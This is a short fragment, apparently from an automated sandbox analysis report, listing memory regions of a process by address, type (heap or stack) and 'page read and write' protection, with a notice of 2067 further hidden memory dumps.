||
221E5ACE000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
29C1E4DD000
|
heap
|
page read and write
|
||
29C1E366000
|
heap
|
page read and write
|
||
2DCE000
|
stack
|
page read and write
|
||
29C1E4DD000
|
heap
|
page read and write
|
||
18E5A766000
|
heap
|
page read and write
|
There are 2067 hidden memdumps, click here to show them.